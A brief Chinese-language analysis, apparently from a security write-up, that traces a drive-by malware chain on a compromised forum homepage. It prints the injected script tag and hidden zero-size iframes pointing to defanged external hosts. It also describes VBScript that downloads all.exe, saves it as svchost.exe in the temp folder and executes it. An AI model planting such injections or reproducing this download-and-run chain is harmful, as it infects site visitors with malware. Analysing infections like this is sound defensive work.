论坛首页包含代码:
/---- <script src="hxxp://www.4**884**6*6.com.**/AdOpen***.asp?Adid=41&MyUserID=dy16"></script> ----/
AdOpen***.asp 中包含代码:
/---- <IFRAME frameBorder=0 height=0 scrolling=no src=hxxp://www***1*.site**e***m.com/***19/0**7/tx**049326/other/wu.htm width=0></IFRAME> ----/
wu.htm 中包含代码:
/---- <iframe src="xskj.htm" width="0" height="0" border="0"></iframe> ----/
xskj.htm 中包含“Ja va script”脚本代码,功能是调用upescape()输出字符串。
输出字符串是中包含多余空格的VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 all.exe,保存为 %temp%/svchost.exe,然后调用自定义函数yunxingexe(m5,Xskj9)。
自定义函数yunxingexe()的功能是创建Shell.Application 对象XsKje,利用 XsKje 的 ShellExecute 方法 来运行 %temp%/svchost.exe。
